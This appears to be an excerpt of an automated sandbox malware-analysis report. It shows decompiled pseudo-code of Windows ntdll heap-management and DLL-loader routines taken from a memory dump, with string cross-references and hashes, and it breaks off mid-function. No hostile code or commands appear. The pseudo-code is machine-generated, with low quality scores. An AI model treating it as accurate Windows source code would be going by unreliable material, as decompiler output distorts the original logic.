                                                                                                0x06e823c5
                                                                                                0x06e823b2
                                                                                                0x00000000

                                                                                                Strings
                                                                                                • HEAP: , xrefs: 06E822E6, 06E823F6
                                                                                                • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 06E82403
                                                                                                • HEAP[%wZ]: , xrefs: 06E822D7, 06E823E7
                                                                                                • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 06E822F3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                                                • API String ID: 0-1657114761
                                                                                                • Opcode ID: a29f1bffda7e50fc3d2936cba4975eca30b2e593b4a8a5ea07123575ebea702e
                                                                                                • Instruction ID: dc8c1fd1276cc14919519488e7c0df4d300cf0c2e7d0365dd9c532a781fc23d6
                                                                                                • Opcode Fuzzy Hash: a29f1bffda7e50fc3d2936cba4975eca30b2e593b4a8a5ea07123575ebea702e
                                                                                                • Instruction Fuzzy Hash: 8BD1DC70A003558FDB98CF68C498BAAB7F1FF48304F15A179D99A9B341E330E985CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 69%
                                                                                                			E06E3A229(void* __ecx, void* __edx) {
                                                                                                				signed int _v20;
                                                                                                				char _v24;
                                                                                                				char _v28;
                                                                                                				void* _v44;
                                                                                                				void* _v48;
                                                                                                				void* _v56;
                                                                                                				void* _v60;
                                                                                                				void* __ebx;
                                                                                                				signed int _t55;
                                                                                                				signed int _t57;
                                                                                                				void* _t61;
                                                                                                				intOrPtr _t62;
                                                                                                				void* _t65;
                                                                                                				void* _t71;
                                                                                                				signed char* _t74;
                                                                                                				intOrPtr _t75;
                                                                                                				signed char* _t80;
                                                                                                				intOrPtr _t81;
                                                                                                				void* _t82;
                                                                                                				signed char* _t85;
                                                                                                				signed char _t91;
                                                                                                				void* _t103;
                                                                                                				void* _t105;
                                                                                                				void* _t121;
                                                                                                				void* _t129;
                                                                                                				signed int _t131;
                                                                                                				void* _t133;
                                                                                                
                                                                                                				_t105 = __ecx;
                                                                                                				_t133 = (_t131 & 0xfffffff8) - 0x1c;
                                                                                                				_t103 = __edx;
                                                                                                				_t129 = __ecx;
                                                                                                				E06E3DF24(__edx,  &_v28, _t133);
                                                                                                				_t55 =  *(_t129 + 0x40) & 0x00040000;
                                                                                                				asm("sbb edi, edi");
                                                                                                				_t121 = ( ~_t55 & 0x0000003c) + 4;
                                                                                                				if(_t55 != 0) {
                                                                                                					_push(0);
                                                                                                					_push(0x14);
                                                                                                					_push( &_v24);
                                                                                                					_push(3);
                                                                                                					_push(_t129);
                                                                                                					_push(0xffffffff);
                                                                                                					_t57 = E06E59730();
                                                                                                					__eflags = _t57;
                                                                                                					if(_t57 < 0) {
                                                                                                						L17:
                                                                                                						_push(_t105);
                                                                                                						E06EDA80D(_t129, 1, _v20, 0);
                                                                                                						_t121 = 4;
                                                                                                						goto L1;
                                                                                                					}
                                                                                                					__eflags = _v20 & 0x00000060;
                                                                                                					if((_v20 & 0x00000060) == 0) {
                                                                                                						goto L17;
                                                                                                					}
                                                                                                					__eflags = _v24 - _t129;
                                                                                                					if(_v24 == _t129) {
                                                                                                						goto L1;
                                                                                                					}
                                                                                                					goto L17;
                                                                                                				}
                                                                                                				L1:
                                                                                                				_push(_t121);
                                                                                                				_push(0x1000);
                                                                                                				_push(_t133 + 0x14);
                                                                                                				_push(0);
                                                                                                				_push(_t133 + 0x20);
                                                                                                				_push(0xffffffff);
                                                                                                				_t61 = E06E59660();
                                                                                                				_t122 = _t61;
                                                                                                				if(_t61 < 0) {
                                                                                                					_t62 =  *[fs:0x30];
                                                                                                					 *((intOrPtr*)(_t129 + 0x218)) =  *((intOrPtr*)(_t129 + 0x218)) + 1;
                                                                                                					__eflags =  *(_t62 + 0xc);
                                                                                                					if( *(_t62 + 0xc) == 0) {
                                                                                                						_push("HEAP: ");
                                                                                                						E06E1B150();
                                                                                                					} else {
                                                                                                						E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                					}
                                                                                                					_push( *((intOrPtr*)(_t133 + 0xc)));
                                                                                                					_push( *((intOrPtr*)(_t133 + 0x14)));
                                                                                                					_push(_t129);
                                                                                                					E06E1B150("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t122);
                                                                                                					_t65 = 0;
                                                                                                					L13:
                                                                                                					return _t65;
                                                                                                				}
                                                                                                				_t71 = E06E37D50();
                                                                                                				_t124 = 0x7ffe0380;
                                                                                                				if(_t71 != 0) {
                                                                                                					_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                				} else {
                                                                                                					_t74 = 0x7ffe0380;
                                                                                                				}
                                                                                                				if( *_t74 != 0) {
                                                                                                					_t75 =  *[fs:0x30];
                                                                                                					__eflags =  *(_t75 + 0x240) & 0x00000001;
                                                                                                					if(( *(_t75 + 0x240) & 0x00000001) != 0) {
                                                                                                						E06ED138A(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)),  *((intOrPtr*)(_t133 + 0x10)), 8);
                                                                                                					}
                                                                                                				}
                                                                                                				 *((intOrPtr*)(_t129 + 0x230)) =  *((intOrPtr*)(_t129 + 0x230)) - 1;
                                                                                                				 *((intOrPtr*)(_t129 + 0x234)) =  *((intOrPtr*)(_t129 + 0x234)) -  *((intOrPtr*)(_t133 + 0xc));
                                                                                                				if(E06E37D50() != 0) {
                                                                                                					_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                				} else {
                                                                                                					_t80 = _t124;
                                                                                                				}
                                                                                                				if( *_t80 != 0) {
                                                                                                					_t81 =  *[fs:0x30];
                                                                                                					__eflags =  *(_t81 + 0x240) & 0x00000001;
                                                                                                					if(( *(_t81 + 0x240) & 0x00000001) != 0) {
                                                                                                						__eflags = E06E37D50();
                                                                                                						if(__eflags != 0) {
                                                                                                							_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                						}
                                                                                                						E06ED1582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t124 & 0x000000ff);
                                                                                                					}
                                                                                                				}
                                                                                                				_t82 = E06E37D50();
                                                                                                				_t125 = 0x7ffe038a;
                                                                                                				if(_t82 != 0) {
                                                                                                					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                                                                                				} else {
                                                                                                					_t85 = 0x7ffe038a;
                                                                                                				}
                                                                                                				if( *_t85 != 0) {
                                                                                                					__eflags = E06E37D50();
                                                                                                					if(__eflags != 0) {
                                                                                                						_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                                                                                						__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                                                                                					}
                                                                                                					E06ED1582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t125 & 0x000000ff);
                                                                                                				}
                                                                                                				 *((intOrPtr*)(_t129 + 0x20c)) =  *((intOrPtr*)(_t129 + 0x20c)) + 1;
                                                                                                				_t91 =  *(_t103 + 2);
                                                                                                				if((_t91 & 0x00000004) != 0) {
                                                                                                					E06E6D5E0( *((intOrPtr*)(_t133 + 0x18)),  *((intOrPtr*)(_t133 + 0x10)), 0xfeeefeee);
                                                                                                					_t91 =  *(_t103 + 2);
                                                                                                				}
                                                                                                				 *(_t103 + 2) = _t91 & 0x00000017;
                                                                                                				_t65 = 1;
                                                                                                				goto L13;
                                                                                                			}
                                                                                                0x06e81dbb
                                                                                                0x06e81dc1
                                                                                                0x06e81dc5
                                                                                                0x06e81de4
                                                                                                0x06e81de9
                                                                                                0x06e81dc7
                                                                                                0x06e81ddc
                                                                                                0x06e81de1
                                                                                                0x06e81def
                                                                                                0x06e81df3
                                                                                                0x06e81df7
                                                                                                0x06e81dfe
                                                                                                0x06e81e06
                                                                                                0x06e3a302
                                                                                                0x06e3a308
                                                                                                0x06e3a308
                                                                                                0x06e3a288
                                                                                                0x06e3a28d
                                                                                                0x06e3a294
                                                                                                0x06e81cc1
                                                                                                0x06e3a29a
                                                                                                0x06e3a29a
                                                                                                0x06e3a29a
                                                                                                0x06e3a29f
                                                                                                0x06e81ccb
                                                                                                0x06e81cd1
                                                                                                0x06e81cd8
                                                                                                0x06e81cea
                                                                                                0x06e81cea
                                                                                                0x06e81cd8
                                                                                                0x06e3a2a9
                                                                                                0x06e3a2af
                                                                                                0x06e3a2bc
                                                                                                0x06e81cfd
                                                                                                0x06e3a2c2
                                                                                                0x06e3a2c2
                                                                                                0x06e3a2c2
                                                                                                0x06e3a2c7
                                                                                                0x06e81d07
                                                                                                0x06e81d0d
                                                                                                0x06e81d14
                                                                                                0x06e81d1f
                                                                                                0x06e81d21
                                                                                                0x06e81d2c
                                                                                                0x06e81d2c
                                                                                                0x06e81d2c
                                                                                                0x06e81d47
                                                                                                0x06e81d47
                                                                                                0x06e81d14
                                                                                                0x06e3a2cd
                                                                                                0x06e3a2d2
                                                                                                0x06e3a2d9
                                                                                                0x06e81d5a
                                                                                                0x06e3a2df
                                                                                                0x06e3a2df
                                                                                                0x06e3a2df
                                                                                                0x06e3a2e4
                                                                                                0x06e81d69
                                                                                                0x06e81d6b
                                                                                                0x06e81d76
                                                                                                0x06e81d76
                                                                                                0x06e81d76
                                                                                                0x06e81d91
                                                                                                0x06e81d91
                                                                                                0x06e3a2ea
                                                                                                0x06e3a2f0
                                                                                                0x06e3a2f5
                                                                                                0x06e81da8
                                                                                                0x06e81dad
                                                                                                0x06e81dad
                                                                                                0x06e3a2fd
                                                                                                0x06e3a300
                                                                                                0x00000000

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                                                • API String ID: 2994545307-2586055223
                                                                                                • Opcode ID: c91d00500e44324507cbfeeb69537354ec26aecd37781c52553189b2c48eade5
                                                                                                • Instruction ID: 87a9da56c311e6d0b622bee57d8fe8a854fa7a61e9784f6b3b9e17e1788bb447
                                                                                                • Opcode Fuzzy Hash: c91d00500e44324507cbfeeb69537354ec26aecd37781c52553189b2c48eade5
                                                                                                • Instruction Fuzzy Hash: ED5136722147819FE7A1EB68CD48FA777E8FF80754F091468F8A98B292D734D841CB61
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 44%
                                                                                                			E06E48E00(void* __ecx) {
                                                                                                				signed int _v8;
                                                                                                				char _v12;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				intOrPtr* _t32;
                                                                                                				intOrPtr _t35;
                                                                                                				intOrPtr _t43;
                                                                                                				void* _t46;
                                                                                                				intOrPtr _t47;
                                                                                                				void* _t48;
                                                                                                				signed int _t49;
                                                                                                				void* _t50;
                                                                                                				intOrPtr* _t51;
                                                                                                				signed int _t52;
                                                                                                				void* _t53;
                                                                                                				intOrPtr _t55;
                                                                                                
                                                                                                				_v8 =  *0x6f0d360 ^ _t52;
                                                                                                				_t49 = 0;
                                                                                                				_t48 = __ecx;
                                                                                                				_t55 =  *0x6f08464; // 0x76690110
                                                                                                				if(_t55 == 0) {
                                                                                                					L9:
                                                                                                					if( !_t49 >= 0) {
                                                                                                						if(( *0x6f05780 & 0x00000003) != 0) {
                                                                                                							E06E95510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
                                                                                                						}
                                                                                                						if(( *0x6f05780 & 0x00000010) != 0) {
                                                                                                							asm("int3");
                                                                                                						}
                                                                                                					}
                                                                                                					return E06E5B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
                                                                                                				}
                                                                                                				_t47 =  *((intOrPtr*)(__ecx + 0x18));
                                                                                                				_t43 =  *0x6f07984; // 0xe22ca0
                                                                                                				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
                                                                                                					_t32 =  *((intOrPtr*)(_t48 + 0x28));
                                                                                                					if(_t48 == _t43) {
                                                                                                						_t50 = 0x5c;
                                                                                                						if( *_t32 == _t50) {
                                                                                                							_t46 = 0x3f;
                                                                                                							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
                                                                                                								_t32 = _t32 + 8;
                                                                                                							}
                                                                                                						}
                                                                                                					}
                                                                                                					_t51 =  *0x6f08464; // 0x76690110
                                                                                                					 *0x6f0b1e0(_t47, _t32,  &_v12);
                                                                                                					_t49 =  *_t51();
                                                                                                					if(_t49 >= 0) {
                                                                                                						L8:
                                                                                                						_t35 = _v12;
                                                                                                						if(_t35 != 0) {
                                                                                                							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
                                                                                                								E06E49B10( *((intOrPtr*)(_t48 + 0x48)));
                                                                                                								_t35 = _v12;
                                                                                                							}
                                                                                                							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
                                                                                                						}
                                                                                                						goto L9;
                                                                                                					}
                                                                                                					if(_t49 != 0xc000008a) {
                                                                                                						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
                                                                                                							if(_t49 != 0xc00000bb) {
                                                                                                								goto L8;
                                                                                                							}
                                                                                                						}
                                                                                                					}
                                                                                                					if(( *0x6f05780 & 0x00000005) != 0) {
                                                                                                						_push(_t49);
                                                                                                						E06E95510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
                                                                                                						_t53 = _t53 + 0x1c;
                                                                                                					}
                                                                                                					_t49 = 0;
                                                                                                					goto L8;
                                                                                                				} else {
                                                                                                					goto L9;
                                                                                                				}
                                                                                                			}





















                                                                                                Strings
                                                                                                • LdrpFindDllActivationContext, xrefs: 06E89331, 06E8935D
                                                                                                • minkernel\ntdll\ldrsnap.c, xrefs: 06E8933B, 06E89367
                                                                                                • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 06E8932A
                                                                                                • Querying the active activation context failed with status 0x%08lx, xrefs: 06E89357
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                                • API String ID: 0-3779518884
                                                                                                • Opcode ID: 915f803b983f19534088344854308759224060ac55efb8fcc20d387ee1efa698
                                                                                                • Instruction ID: 6d5c0fd6eb322b1eac74f27f2e6b1d6f90ca6c101e60a4825067e3a97bd68238
                                                                                                • Opcode Fuzzy Hash: 915f803b983f19534088344854308759224060ac55efb8fcc20d387ee1efa698
                                                                                                • Instruction Fuzzy Hash: FD412931E10315AFEBF5BB38ACC9A77B3A5BB4464CF066169DA0857151E770EC84C2C2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                                                • API String ID: 2994545307-336120773
                                                                                                • Opcode ID: ec1803a8d58a8cb7a8c913880185379dc874a7778b26f4f3fabac81695b5be57
                                                                                                • Instruction ID: 48cfd4f6d23024d0c3ead8193786cb6f9082f9300725644c0de389f6a63628e7
                                                                                                • Opcode Fuzzy Hash: ec1803a8d58a8cb7a8c913880185379dc874a7778b26f4f3fabac81695b5be57
                                                                                                • Instruction Fuzzy Hash: F8312331610354EFD3D0DB58CC84F6BB3E8EF14624F195175F515DB280E670E885CAA8
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 78%
                                                                                                			E06E399BF(signed int __ecx, signed short* __edx, signed int* _a4, signed int _a8) {
                                                                                                				char _v5;
                                                                                                				signed int _v12;
                                                                                                				signed int _v16;
                                                                                                				signed short _v20;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				void* __ebp;
                                                                                                				signed short _t186;
                                                                                                				intOrPtr _t187;
                                                                                                				signed short _t190;
                                                                                                				signed int _t196;
                                                                                                				signed short _t197;
                                                                                                				intOrPtr _t203;
                                                                                                				signed int _t207;
                                                                                                				signed int _t210;
                                                                                                				signed short _t215;
                                                                                                				intOrPtr _t216;
                                                                                                				signed short _t219;
                                                                                                				signed int _t221;
                                                                                                				signed short _t222;
                                                                                                				intOrPtr _t228;
                                                                                                				signed int _t232;
                                                                                                				signed int _t235;
                                                                                                				signed int _t250;
                                                                                                				signed short _t251;
                                                                                                				intOrPtr _t252;
                                                                                                				signed short _t254;
                                                                                                				intOrPtr _t255;
                                                                                                				signed int _t258;
                                                                                                				signed int _t259;
                                                                                                				signed short _t262;
                                                                                                				intOrPtr _t271;
                                                                                                				signed int _t279;
                                                                                                				signed int _t282;
                                                                                                				signed int _t284;
                                                                                                				signed int _t286;
                                                                                                				intOrPtr _t292;
                                                                                                				signed int _t296;
                                                                                                				signed int _t299;
                                                                                                				signed int _t307;
                                                                                                				signed int* _t309;
                                                                                                				signed short* _t311;
                                                                                                				signed short* _t313;
                                                                                                				signed char _t314;
                                                                                                				intOrPtr _t316;
                                                                                                				signed int _t323;
                                                                                                				signed char _t328;
                                                                                                				signed short* _t330;
                                                                                                				signed char _t331;
                                                                                                				intOrPtr _t335;
                                                                                                				signed int _t342;
                                                                                                				signed char _t347;
                                                                                                				signed short* _t348;
                                                                                                				signed short* _t350;
                                                                                                				signed short _t352;
                                                                                                				signed char _t354;
                                                                                                				intOrPtr _t357;
                                                                                                				intOrPtr* _t364;
                                                                                                				signed char _t365;
                                                                                                				intOrPtr _t366;
                                                                                                				signed int _t373;
                                                                                                				signed char _t378;
                                                                                                				signed int* _t381;
                                                                                                				signed int _t382;
                                                                                                				signed short _t384;
                                                                                                				signed int _t386;
                                                                                                				unsigned int _t390;
                                                                                                				signed int _t393;
                                                                                                				signed int* _t394;
                                                                                                				unsigned int _t398;
                                                                                                				signed short _t400;
                                                                                                				signed short _t402;
                                                                                                				signed int _t404;
                                                                                                				signed int _t407;
                                                                                                				unsigned int _t411;
                                                                                                				signed short* _t414;
                                                                                                				signed int _t415;
                                                                                                				signed short* _t419;
                                                                                                				signed int* _t420;
                                                                                                				void* _t421;
                                                                                                
                                                                                                				_t414 = __edx;
                                                                                                				_t307 = __ecx;
                                                                                                				_t419 = __edx - (( *(__edx + 4) & 0x0000ffff ^  *(__ecx + 0x54) & 0x0000ffff) << 3);
                                                                                                				if(_t419 == __edx || (( *(__ecx + 0x4c) >> 0x00000014 &  *(__ecx + 0x52) ^ _t419[1]) & 0x00000001) != 0) {
                                                                                                					_v5 = _a8;
                                                                                                					L3:
                                                                                                					_t381 = _a4;
                                                                                                					goto L4;
                                                                                                				} else {
                                                                                                					__eflags =  *(__ecx + 0x4c);
                                                                                                					if( *(__ecx + 0x4c) != 0) {
                                                                                                						_t411 =  *(__ecx + 0x50) ^  *_t419;
                                                                                                						 *_t419 = _t411;
                                                                                                						_t378 = _t411 >> 0x00000010 ^ _t411 >> 0x00000008 ^ _t411;
                                                                                                						__eflags = _t411 >> 0x18 - _t378;
                                                                                                						if(__eflags != 0) {
                                                                                                							_push(_t378);
                                                                                                							E06ECFA2B(__ecx, __ecx, _t419, __edx, _t419, __eflags);
                                                                                                						}
                                                                                                					}
                                                                                                					_t250 = _a8;
                                                                                                					_v5 = _t250;
                                                                                                					__eflags = _t250;
                                                                                                					if(_t250 != 0) {
                                                                                                						_t400 = _t414[6];
                                                                                                						_t53 =  &(_t414[4]); // -16
                                                                                                						_t348 = _t53;
                                                                                                						_t251 =  *_t348;
                                                                                                						_v12 = _t251;
                                                                                                						_v16 = _t400;
                                                                                                						_t252 =  *((intOrPtr*)(_t251 + 4));
                                                                                                						__eflags =  *_t400 - _t252;
                                                                                                						if( *_t400 != _t252) {
                                                                                                							L49:
                                                                                                							_push(_t348);
                                                                                                							_push( *_t400);
                                                                                                							E06EDA80D(_t307, 0xd, _t348, _t252);
                                                                                                							L50:
                                                                                                							_v5 = 0;
                                                                                                							goto L11;
                                                                                                						}
                                                                                                						__eflags =  *_t400 - _t348;
                                                                                                						if( *_t400 != _t348) {
                                                                                                							goto L49;
                                                                                                						}
                                                                                                						 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
                                                                                                						_t407 =  *(_t307 + 0xb4);
                                                                                                						__eflags = _t407;
                                                                                                						if(_t407 == 0) {
                                                                                                							L36:
                                                                                                							_t364 = _v16;
                                                                                                							_t282 = _v12;
                                                                                                							 *_t364 = _t282;
                                                                                                							 *((intOrPtr*)(_t282 + 4)) = _t364;
                                                                                                							__eflags = _t414[1] & 0x00000008;
                                                                                                							if((_t414[1] & 0x00000008) == 0) {
                                                                                                								L39:
                                                                                                								_t365 = _t414[1];
                                                                                                								__eflags = _t365 & 0x00000004;
                                                                                                								if((_t365 & 0x00000004) != 0) {
                                                                                                									_t284 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
                                                                                                									_v12 = _t284;
                                                                                                									__eflags = _t365 & 0x00000002;
                                                                                                									if((_t365 & 0x00000002) != 0) {
                                                                                                										__eflags = _t284 - 4;
                                                                                                										if(_t284 > 4) {
                                                                                                											_t284 = _t284 - 4;
                                                                                                											__eflags = _t284;
                                                                                                											_v12 = _t284;
                                                                                                										}
                                                                                                									}
                                                                                                									_t78 =  &(_t414[8]); // -8
                                                                                                									_t286 = E06E6D540(_t78, _t284, 0xfeeefeee);
                                                                                                									_v16 = _t286;
                                                                                                									__eflags = _t286 - _v12;
                                                                                                									if(_t286 != _v12) {
                                                                                                										_t366 =  *[fs:0x30];
                                                                                                										__eflags =  *(_t366 + 0xc);
                                                                                                										if( *(_t366 + 0xc) == 0) {
                                                                                                											_push("HEAP: ");
                                                                                                											E06E1B150();
                                                                                                										} else {
                                                                                                											E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                										}
                                                                                                										_push(_v16 + 0x10 + _t414);
                                                                                                										E06E1B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
                                                                                                										_t292 =  *[fs:0x30];
                                                                                                										_t421 = _t421 + 0xc;
                                                                                                										__eflags =  *((char*)(_t292 + 2));
                                                                                                										if( *((char*)(_t292 + 2)) != 0) {
                                                                                                											 *0x6f06378 = 1;
                                                                                                											asm("int3");
                                                                                                											 *0x6f06378 = 0;
                                                                                                										}
                                                                                                									}
                                                                                                								}
                                                                                                								goto L50;
                                                                                                							}
                                                                                                							_t296 = E06E3A229(_t307, _t414);
                                                                                                							__eflags = _t296;
                                                                                                							if(_t296 != 0) {
                                                                                                								goto L39;
                                                                                                							} else {
                                                                                                								E06E3A309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
                                                                                                								goto L50;
                                                                                                							}
                                                                                                						} else {
                                                                                                							_t373 =  *_t414 & 0x0000ffff;
                                                                                                							while(1) {
                                                                                                								__eflags = _t373 -  *((intOrPtr*)(_t407 + 4));
                                                                                                								if(_t373 <  *((intOrPtr*)(_t407 + 4))) {
                                                                                                									_t301 = _t373;
                                                                                                									break;
                                                                                                								}
                                                                                                								_t299 =  *_t407;
                                                                                                								__eflags = _t299;
                                                                                                								if(_t299 == 0) {
                                                                                                									_t301 =  *((intOrPtr*)(_t407 + 4)) - 1;
                                                                                                									__eflags =  *((intOrPtr*)(_t407 + 4)) - 1;
                                                                                                									break;
                                                                                                								} else {
                                                                                                									_t407 = _t299;
                                                                                                									continue;
                                                                                                								}
                                                                                                							}
                                                                                                							_t62 =  &(_t414[4]); // -16
                                                                                                							E06E3BC04(_t307, _t407, 1, _t62, _t301, _t373);
                                                                                                							goto L36;
                                                                                                						}
                                                                                                					}
                                                                                                					L11:
                                                                                                					_t402 = _t419[6];
                                                                                                					_t25 =  &(_t419[4]); // -16
                                                                                                					_t350 = _t25;
                                                                                                					_t254 =  *_t350;
                                                                                                					_v12 = _t254;
                                                                                                					_v20 = _t402;
                                                                                                					_t255 =  *((intOrPtr*)(_t254 + 4));
                                                                                                					__eflags =  *_t402 - _t255;
                                                                                                					if( *_t402 != _t255) {
                                                                                                						L61:
                                                                                                						_push(_t350);
                                                                                                						_push( *_t402);
                                                                                                						E06EDA80D(_t307, 0xd, _t350, _t255);
                                                                                                						goto L3;
                                                                                                					}
                                                                                                					__eflags =  *_t402 - _t350;
                                                                                                					if( *_t402 != _t350) {
                                                                                                						goto L61;
                                                                                                					}
                                                                                                					 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t419 & 0x0000ffff);
                                                                                                					_t404 =  *(_t307 + 0xb4);
                                                                                                					__eflags = _t404;
                                                                                                					if(_t404 == 0) {
                                                                                                						L20:
                                                                                                						_t352 = _v20;
                                                                                                						_t258 = _v12;
                                                                                                						 *_t352 = _t258;
                                                                                                						 *(_t258 + 4) = _t352;
                                                                                                						__eflags = _t419[1] & 0x00000008;
                                                                                                						if((_t419[1] & 0x00000008) != 0) {
                                                                                                							_t259 = E06E3A229(_t307, _t419);
                                                                                                							__eflags = _t259;
                                                                                                							if(_t259 != 0) {
                                                                                                								goto L21;
                                                                                                							} else {
                                                                                                								E06E3A309(_t307, _t419,  *_t419 & 0x0000ffff, 1);
                                                                                                								goto L3;
                                                                                                							}
                                                                                                						}
                                                                                                						L21:
                                                                                                						_t354 = _t419[1];
                                                                                                						__eflags = _t354 & 0x00000004;
                                                                                                						if((_t354 & 0x00000004) != 0) {
                                                                                                							_t415 = ( *_t419 & 0x0000ffff) * 8 - 0x10;
                                                                                                							__eflags = _t354 & 0x00000002;
                                                                                                							if((_t354 & 0x00000002) != 0) {
                                                                                                								__eflags = _t415 - 4;
                                                                                                								if(_t415 > 4) {
                                                                                                									_t415 = _t415 - 4;
                                                                                                									__eflags = _t415;
                                                                                                								}
                                                                                                							}
                                                                                                							_t91 =  &(_t419[8]); // -8
                                                                                                							_t262 = E06E6D540(_t91, _t415, 0xfeeefeee);
                                                                                                							_v20 = _t262;
                                                                                                							__eflags = _t262 - _t415;
                                                                                                							if(_t262 != _t415) {
                                                                                                								_t357 =  *[fs:0x30];
                                                                                                								__eflags =  *(_t357 + 0xc);
